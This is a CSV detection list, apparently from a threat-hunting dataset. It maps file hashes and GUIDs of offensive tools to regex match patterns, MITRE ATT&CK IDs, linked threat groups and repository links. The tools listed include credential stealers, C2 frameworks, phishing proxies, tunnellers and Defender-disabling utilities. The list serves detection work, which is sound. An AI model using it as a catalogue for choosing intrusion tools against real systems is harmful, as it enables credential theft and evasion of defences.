"*52B0FF57-7E0A-4CA9-84D4-58DFA2456BA5*",".{0,1000}52B0FF57\-7E0A\-4CA9\-84D4\-58DFA2456BA5.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#GUIDproject","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","26682"
"*52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d*",".{0,1000}52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26683"
"*52b6c057a9e0af822cbe129053d2c2d3541bf6e9ef162432fae60fdbd7a2d0f0*",".{0,1000}52b6c057a9e0af822cbe129053d2c2d3541bf6e9ef162432fae60fdbd7a2d0f0.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","26684"
"*52b9c0a0a0188e47cb4b812aabe5a1832633fe9d66cebf702dfe0de114db0abd*",".{0,1000}52b9c0a0a0188e47cb4b812aabe5a1832633fe9d66cebf702dfe0de114db0abd.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","26685"
"*52BBA3C2-A74E-4096-B65F-B88C38F92120*",".{0,1000}52BBA3C2\-A74E\-4096\-B65F\-B88C38F92120.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#GUIDproject","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","26687"
"*52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e*",".{0,1000}52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26689"
"*52c4aec0ba85cd0473e25bcc45735b6138b4741f7cea4d4d7591f020e5c6b8db*",".{0,1000}52c4aec0ba85cd0473e25bcc45735b6138b4741f7cea4d4d7591f020e5c6b8db.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26690"
"*52c54e36cc278993f45d25a56307059f6b6682d802045eaf8eab92ae577eb2e4*",".{0,1000}52c54e36cc278993f45d25a56307059f6b6682d802045eaf8eab92ae577eb2e4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26691"
"*52d62dd2ac25d6b464a5238f3dcd7634a92d82b841c879760a51b03a5ff6de0e*",".{0,1000}52d62dd2ac25d6b464a5238f3dcd7634a92d82b841c879760a51b03a5ff6de0e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26694"
"*52ee64e32e40b7fb75d57b97f66359cad87fe7a6bace5cdd3a17bd48be13e878*",".{0,1000}52ee64e32e40b7fb75d57b97f66359cad87fe7a6bace5cdd3a17bd48be13e878.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26697"
"*52fd942b96c1251abbde6cf9908edae5b2d325791e689a65c6ab028e2de689a3*",".{0,1000}52fd942b96c1251abbde6cf9908edae5b2d325791e689a65c6ab028e2de689a3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26701"
"*52ff6af0c995ccf66fcd0379f1236578a907768eac72bf659cd7c567c5bb70b2*",".{0,1000}52ff6af0c995ccf66fcd0379f1236578a907768eac72bf659cd7c567c5bb70b2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","26702"
"*5306a5bf3f43607ea55452f85c45e42aab36652680609b4f53324f8c95121777*",".{0,1000}5306a5bf3f43607ea55452f85c45e42aab36652680609b4f53324f8c95121777.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26703"
"*5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905*",".{0,1000}5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","26704"
"*53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9*",".{0,1000}53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26706"
"*53182258-F40E-4104-AFC6-1F327E556E77*",".{0,1000}53182258\-F40E\-4104\-AFC6\-1F327E556E77.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26707"
"*531870bd9f59ac799dfa6573472db1966cd3a9f8ece84d2f2e409e4384770b4a*",".{0,1000}531870bd9f59ac799dfa6573472db1966cd3a9f8ece84d2f2e409e4384770b4a.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","#filehash","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","26708"
"*5323c783db3710a6802c7398d387b027115a1fccc2b98888a820bd0f0b0ce605*",".{0,1000}5323c783db3710a6802c7398d387b027115a1fccc2b98888a820bd0f0b0ce605.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26710"
"*532a1b17840d0746c48f98d0f24443bd60111db4f3c5f82872ec5e4e6854438a*",".{0,1000}532a1b17840d0746c48f98d0f24443bd60111db4f3c5f82872ec5e4e6854438a.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","26712"
"*532a20950a7c2ed819e89c04f70cd0b9d1f42507f29f8850e7c4720d17cbed5f*",".{0,1000}532a20950a7c2ed819e89c04f70cd0b9d1f42507f29f8850e7c4720d17cbed5f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26713"
"*5332d9912c90a6b8c7deead3f3b592b5ed63b81e78fef31bfdc04ac3054e879c*",".{0,1000}5332d9912c90a6b8c7deead3f3b592b5ed63b81e78fef31bfdc04ac3054e879c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26718"
"*5338267c8ef94a98f32ff42a23862c5dd42a3c19a7ad3d250ff1a9f263c17974*",".{0,1000}5338267c8ef94a98f32ff42a23862c5dd42a3c19a7ad3d250ff1a9f263c17974.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","26720"
"*53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04*",".{0,1000}53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","26721"
"*533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572*",".{0,1000}533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26722"
"*534b0370d1bff7e4a0f327d7fa01679a10cfffc67dbefa5f45e49dbbadec7fa3*",".{0,1000}534b0370d1bff7e4a0f327d7fa01679a10cfffc67dbefa5f45e49dbbadec7fa3.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","26724"
"*534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803*",".{0,1000}534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26725"
"*534D9A24-3138-4209-A4C6-6B9C1EF0B579*",".{0,1000}534D9A24\-3138\-4209\-A4C6\-6B9C1EF0B579.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","26726"
"*535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760*",".{0,1000}535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","26727"
"*535d2f13597a9418a665c526c21d8388d0af43f331b2da125ffc74f0b0686cd2*",".{0,1000}535d2f13597a9418a665c526c21d8388d0af43f331b2da125ffc74f0b0686cd2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26728"
"*535fd52e4d4887de46e469b65735e1f772ff398bd39c8f9b2995e513ee6e3fb3*",".{0,1000}535fd52e4d4887de46e469b65735e1f772ff398bd39c8f9b2995e513ee6e3fb3.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26729"
"*536361a703d684f914e9c94d99ef45a18cba34ff7f2bb045752afe2534b904fe*",".{0,1000}536361a703d684f914e9c94d99ef45a18cba34ff7f2bb045752afe2534b904fe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26730"
"*5374b615af370b5b03281366c6561f4ebb4f0f2716e8005f07cc4572d865b80a*",".{0,1000}5374b615af370b5b03281366c6561f4ebb4f0f2716e8005f07cc4572d865b80a.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","26732"
"*537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7*",".{0,1000}537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26734"
"*537afccaa5bf9ab3024691cea87acaf87f457798388856ab41bde9e30515c300*",".{0,1000}537afccaa5bf9ab3024691cea87acaf87f457798388856ab41bde9e30515c300.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26735"
"*537dfda00b6ce57ca35f3da4eaac5cfc42c4180d5573673a66c4665517d0a208*",".{0,1000}537dfda00b6ce57ca35f3da4eaac5cfc42c4180d5573673a66c4665517d0a208.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","26736"
"*537ea05a68fa2fc81101b89b2a603469d497bf1d31134cf1a7b8971c5d84141f*",".{0,1000}537ea05a68fa2fc81101b89b2a603469d497bf1d31134cf1a7b8971c5d84141f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","26737"
"*537fee794fe5532349360a40d90c0e0e37f9532b0101dbb17174e27cc4aa0d51*",".{0,1000}537fee794fe5532349360a40d90c0e0e37f9532b0101dbb17174e27cc4aa0d51.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26738"
"*53891DF6-3F6D-DE4B-A8CD-D89E94D0C8CD*",".{0,1000}53891DF6\-3F6D\-DE4B\-A8CD\-D89E94D0C8CD.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#GUIDproject","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","26739"
"*5393591887944346cc4d8f6af3199b63b7480354d553fcddb35c34feb9c6b8d7*",".{0,1000}5393591887944346cc4d8f6af3199b63b7480354d553fcddb35c34feb9c6b8d7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26740"
"*5397c248984f9681bec95bd71753e0516bab6e907a0517620a5f7549760e89f0*",".{0,1000}5397c248984f9681bec95bd71753e0516bab6e907a0517620a5f7549760e89f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26741"
"*53a8f4b6cd47f980a97be192fdbf70c028065c7bfdf2e461927c7561eafbea6b*",".{0,1000}53a8f4b6cd47f980a97be192fdbf70c028065c7bfdf2e461927c7561eafbea6b.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#filehash","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","26743"
"*53a9c6eed3ee5ed0ea6fe900bbcdac2b9c0709c57c8d82688ef32f7e2b784f60*",".{0,1000}53a9c6eed3ee5ed0ea6fe900bbcdac2b9c0709c57c8d82688ef32f7e2b784f60.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #filehash","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","26744"
"*53b439d28020a437a1d940fb4c9525283c8093326c1c187da245282e840ba0a4*",".{0,1000}53b439d28020a437a1d940fb4c9525283c8093326c1c187da245282e840ba0a4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26748"
"*53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451*",".{0,1000}53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26750"
"*53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451*",".{0,1000}53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26751"
"*53c5ce630848990bacd8fbc314944205c6f9d3428d713cb457190290b0c51769*",".{0,1000}53c5ce630848990bacd8fbc314944205c6f9d3428d713cb457190290b0c51769.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26753"
"*53ceac06a248c60ecf2879fa2cab20508ddc1b73d91e8a418655c64f991838c2*",".{0,1000}53ceac06a248c60ecf2879fa2cab20508ddc1b73d91e8a418655c64f991838c2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26757"
"*53e18a3e3ac71cf173f06cc3f01a00744fa0b1c3af7ba8de1e62b881299247a1*",".{0,1000}53e18a3e3ac71cf173f06cc3f01a00744fa0b1c3af7ba8de1e62b881299247a1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26759"
"*53ef079f580e806d9fae5fd698616574623fd44467c446540ba1194c20c6c388*",".{0,1000}53ef079f580e806d9fae5fd698616574623fd44467c446540ba1194c20c6c388.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26762"
"*53ef805c456f2b3312be89695e41cc4693cf6fe169388c32aedb207e1d3a6a6b*",".{0,1000}53ef805c456f2b3312be89695e41cc4693cf6fe169388c32aedb207e1d3a6a6b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26763"
